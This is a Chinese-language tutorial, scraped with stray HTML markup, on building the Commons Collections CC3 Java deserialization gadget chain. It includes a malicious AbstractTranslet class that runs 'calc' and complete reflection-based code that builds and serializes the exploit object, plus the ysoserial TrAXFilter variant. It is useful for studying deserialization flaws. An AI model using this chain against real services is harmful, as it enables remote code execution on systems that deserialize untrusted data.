Java安全：CC3链构造过程详解<\/h1>

1. 背景知识<\/h2>

1.1 Java类动态加载的安全问题<\/h3>
Java类动态加载机制会调用`defineClass<\/code>方法，该方法可以将一个class字节码转化为Java对象并加载到内存中。当我们在静态代码块中写入恶意代码时，defineClass<\/code>执行并且newInstance<\/code>后，恶意代码就会自动执行。<\/p>`

2. CC3链核心原理<\/h2>
2.1 关键类分析<\/h3>
CC3链的命令执行关键在于defineClass<\/code>方法。通过逆向分析调用链：<\/p>

TemplatesImpl<\/code>类中的defineClass<\/code>是default权限，只能在同一包内调用<\/li>
同一包内的defineTransletClasses<\/code>方法调用了defineClass<\/code>，但它是private方法<\/li>
getTransletInstance<\/code>调用了defineTransletClasses<\/code>，也是private方法<\/li>
最终newTransformer<\/code>这个public方法调用了getTransletInstance<\/code><\/li>
<\/ol>
2.2 defineTransletClasses方法分析<\/h3>
该方法主要功能：<\/p>

给class数组赋值（赋值为class字节码）<\/li>
构建实例并执行恶意代码<\/li>
<\/ul>
3. CC3链构造过程<\/h2>
3.1 基本构造步骤<\/h3>

创建一个TemplatesImpl<\/code>对象<\/li>
由于内部属性都是private，需要使用反射进行赋值：

需要赋值的字段：

_name<\/code>：任意字符串<\/li>
_bytecodes<\/code>：包含恶意代码的类字节码（二维数组）<\/li>
_tfactory<\/code>：TransformerFactoryImpl<\/code>实例<\/li>
<\/ul>
<\/li>
<\/ul>
<\/li>
<\/ol>
3.2 恶意类构造要求<\/h3>
恶意类必须满足以下条件：<\/p>

必须继承com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet<\/code><\/li>
静态代码块中放置恶意代码<\/li>
<\/ol>
示例恶意类：<\/p>
import<\/span> java.io.IOException;<\/span>
<\/span><\/span>import<\/span> com.sun.org.apache.xalan.internal.xsltc.DOM;<\/span>
<\/span><\/span>import<\/span> com.sun.org.apache.xalan.internal.xsltc.TransletException;<\/span>
<\/span><\/span>import<\/span> com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;<\/span>
<\/span><\/span>import<\/span> com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;<\/span>
<\/span><\/span>import<\/span> com.sun.org.apache.xml.internal.serializer.SerializationHandler;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> evil<\/span> extends<\/span> AbstractTranslet {<\/span>
<\/span><\/span>    static<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc"<\/span>);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>IOException e)<\/span> {<\/span>
<\/span><\/span>            throw<\/span> new<\/span> RuntimeException(<\/span>e);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> transform<\/span>(<\/span>DOM document,<\/span> SerializationHandler[]<\/span> handlers)<\/span> throws<\/span> TransletException {}<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> transform<\/span>(<\/span>DOM document,<\/span> DTMAxisIterator iterator,<\/span> SerializationHandler handler)<\/span> throws<\/span> TransletException {}<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3.3 完整CC3链构造代码<\/h3>
import<\/span> com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;<\/span>
<\/span><\/span>import<\/span> com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.Transformer;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.functors.ChainedTransformer;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.functors.ConstantTransformer;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.functors.InvokerTransformer;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.map.LazyMap;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> java.io.*;<\/span>
<\/span><\/span>import<\/span> java.lang.annotation.Target;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Constructor;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Field;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.InvocationHandler;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Proxy;<\/span>
<\/span><\/span>import<\/span> java.nio.file.Files;<\/span>
<\/span><\/span>import<\/span> java.nio.file.Paths;<\/span>
<\/span><\/span>import<\/span> java.util.HashMap;<\/span>
<\/span><\/span>import<\/span> java.util.Map;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> CC3Test<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        \/\/ 1. 创建并配置TemplatesImpl对象
<\/span><\/span><\/span><\/span>        final<\/span> TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>        final<\/span> Class<<\/span>TemplatesImpl><\/span> templatesClass =<\/span> TemplatesImpl.<\/span>class<\/span>;<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 设置_name字段
<\/span><\/span><\/span><\/span>        final<\/span> Field nameField =<\/span> templatesClass.<\/span>getDeclaredField<\/span>(<\/span>"_name"<\/span>);<\/span>
<\/span><\/span>        nameField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        nameField.<\/span>set<\/span>(<\/span>templates,<\/span>"yuji"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 设置_class字段为null
<\/span><\/span><\/span><\/span>        final<\/span> Field classDeclaredField =<\/span> templatesClass.<\/span>getDeclaredField<\/span>(<\/span>"_class"<\/span>);<\/span>
<\/span><\/span>        classDeclaredField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        classDeclaredField.<\/span>set<\/span>(<\/span>templates,<\/span>null<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 读取恶意类字节码
<\/span><\/span><\/span><\/span>        byte<\/span>[]<\/span> bytecode =<\/span> Files.<\/span>readAllBytes<\/span>(<\/span>Paths.<\/span>get<\/span>(<\/span>"E:\\java_sec\\tmp\\evil.class"<\/span>));<\/span>
<\/span><\/span>        byte<\/span>[][]<\/span> bytecodes =<\/span> {<\/span>bytecode};<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 设置_bytecodes字段
<\/span><\/span><\/span><\/span>        final<\/span> Field bytecodesfield =<\/span> templatesClass.<\/span>getDeclaredField<\/span>(<\/span>"_bytecodes"<\/span>);<\/span>
<\/span><\/span>        bytecodesfield.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        bytecodesfield.<\/span>set<\/span>(<\/span>templates,<\/span>bytecodes);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 设置_tfactory字段
<\/span><\/span><\/span><\/span>        final<\/span> Field tfactoryField =<\/span> templatesClass.<\/span>getDeclaredField<\/span>(<\/span>"_tfactory"<\/span>);<\/span>
<\/span><\/span>        tfactoryField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        tfactoryField.<\/span>set<\/span>(<\/span>templates,<\/span>new<\/span> TransformerFactoryImpl());<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 2. 构造Transformer链
<\/span><\/span><\/span><\/span>        Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>            new<\/span> ConstantTransformer(<\/span>templates),<\/span>
<\/span><\/span>            new<\/span> InvokerTransformer(<\/span>"newTransformer"<\/span>,<\/span> null<\/span>,<\/span> null<\/span>),<\/span>
<\/span><\/span>        };<\/span>
<\/span><\/span>        final<\/span> ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 3. 构造LazyMap
<\/span><\/span><\/span><\/span>        final<\/span> HashMap<<\/span>Object,<\/span> Object><\/span> map =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>        map.<\/span>put<\/span>(<\/span>"value"<\/span>,<\/span>"xxx"<\/span>);<\/span>
<\/span><\/span>        final<\/span> Map lazymap =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>map,<\/span> chainedTransformer);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 4. 构造AnnotationInvocationHandler代理
<\/span><\/span><\/span><\/span>        final<\/span> Class<?><\/span> aClass =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span>
<\/span><\/span>        final<\/span> Constructor<?><\/span> declaredConstructor =<\/span> aClass.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span> Map.<\/span>class<\/span>);<\/span>
<\/span><\/span>        declaredConstructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        final<\/span> InvocationHandler invocationHandler =<\/span> (<\/span>InvocationHandler)<\/span> declaredConstructor.<\/span>newInstance<\/span>(<\/span>Target.<\/span>class<\/span>,<\/span> lazymap);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 5. 创建代理对象
<\/span><\/span><\/span><\/span>        final<\/span> Map proxyInstance =<\/span> (<\/span>Map)<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>
<\/span><\/span>            lazymap.<\/span>getClass<\/span>().<\/span>getClassLoader<\/span>(),<\/span>
<\/span><\/span>            new<\/span> Class[]{<\/span>Map.<\/span>class<\/span>},<\/span>
<\/span><\/span>            invocationHandler);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 6. 创建最终的反序列化对象
<\/span><\/span><\/span><\/span>        final<\/span> Object o =<\/span> declaredConstructor.<\/span>newInstance<\/span>(<\/span>Override.<\/span>class<\/span>,<\/span> proxyInstance);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 序列化和反序列化测试
<\/span><\/span><\/span><\/span>        serialize(<\/span>o);<\/span>
<\/span><\/span>        Deserialize(<\/span>"cc3.ser"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> void<\/span> serialize<\/span>(<\/span>Object obj)<\/span> throws<\/span> IOException {<\/span>
<\/span><\/span>        ObjectOutputStream objectOutputStream =<\/span> new<\/span> ObjectOutputStream(<\/span>new<\/span> FileOutputStream(<\/span>"cc3.ser"<\/span>));<\/span>
<\/span><\/span>        objectOutputStream.<\/span>writeObject<\/span>(<\/span>obj);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> Object Deserialize<\/span>(<\/span>String filename)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        final<\/span> ObjectInputStream objectInputStream =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> FileInputStream(<\/span>filename));<\/span>
<\/span><\/span>        return<\/span> objectInputStream.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3.4 Yso CC3变种分析<\/h3>
Yso中的CC3链实现不使用InvokerTransformer<\/code>，而是使用InstantiateTransformer<\/code>：<\/p>

通过InstantiateTransformer<\/code>实例化TrAXFilter<\/code><\/li>
TrAXFilter<\/code>的构造方法中会调用newTransformer<\/code><\/li>
<\/ol>
实现代码：<\/p>
import<\/span> com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;<\/span>
<\/span><\/span>import<\/span> com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;<\/span>
<\/span><\/span>import<\/span> com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.Transformer;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.functors.ChainedTransformer;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.functors.ConstantTransformer;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.functors.InstantiateTransformer;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.map.LazyMap;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> java.io.*;<\/span>
<\/span><\/span>import<\/span> java.lang.annotation.Target;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Constructor;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Field;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.InvocationHandler;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Proxy;<\/span>
<\/span><\/span>import<\/span> java.nio.file.Files;<\/span>
<\/span><\/span>import<\/span> java.nio.file.Paths;<\/span>
<\/span><\/span>import<\/span> java.util.HashMap;<\/span>
<\/span><\/span>import<\/span> java.util.Map;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> CC3Test2<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        \/\/ TemplatesImpl配置同上...
<\/span><\/span><\/span><\/span>        
<\/span><\/span>        \/\/ 使用InstantiateTransformer替代InvokerTransformer
<\/span><\/span><\/span><\/span>        final<\/span> InstantiateTransformer instantiateTransformer =<\/span> new<\/span> InstantiateTransformer(<\/span>
<\/span><\/span>            new<\/span> Class[]{<\/span>Templates.<\/span>class<\/span>},<\/span> 
<\/span><\/span>            new<\/span> Object[]{<\/span>templates});<\/span>
<\/span><\/span>        
<\/span><\/span>        final<\/span> ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>new<\/span> Transformer[]{<\/span>
<\/span><\/span>            new<\/span> ConstantTransformer(<\/span>TrAXFilter.<\/span>class<\/span>),<\/span>
<\/span><\/span>            instantiateTransformer,<\/span>
<\/span><\/span>        });<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 后续LazyMap和代理构造同上...
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4. 关键点总结<\/h2>


恶意类要求<\/strong>：<\/p>

必须继承AbstractTranslet<\/code><\/li>
静态代码块中放置恶意代码<\/li>
需要实现transform<\/code>方法<\/li>
<\/ul>
<\/li>

TemplatesImpl配置<\/strong>：<\/p>

_name<\/code>：任意非空字符串<\/li>
_bytecodes<\/code>：恶意类字节码数组<\/li>
_tfactory<\/code>：TransformerFactoryImpl<\/code>实例<\/li>
_class<\/code>：设置为null<\/li>
<\/ul>
<\/li>

两种实现方式<\/strong>：<\/p>

传统方式：使用InvokerTransformer<\/code>调用newTransformer<\/code><\/li>
Yso方式：使用InstantiateTransformer<\/code>实例化TrAXFilter<\/code><\/li>
<\/ul>
<\/li>

调用链<\/strong>：<\/p>
readObject() -> AnnotationInvocationHandler#invoke -> LazyMap#get -> 
ChainedTransformer#transform -> InstantiateTransformer#transform -> 
TrAXFilter#constructor -> TemplatesImpl#newTransformer -> 
getTransletInstance -> defineTransletClasses -> defineClass
<\/code><\/pre>
<\/li>

注意事项<\/strong>：<\/p>

需要Commons Collections库<\/li>
不同JDK版本中AnnotationInvocationHandler<\/code>实现可能有差异<\/li>
恶意类必须满足defineTransletClasses<\/code>中的条件判断<\/li>
<\/ul>
<\/li>
<\/ol>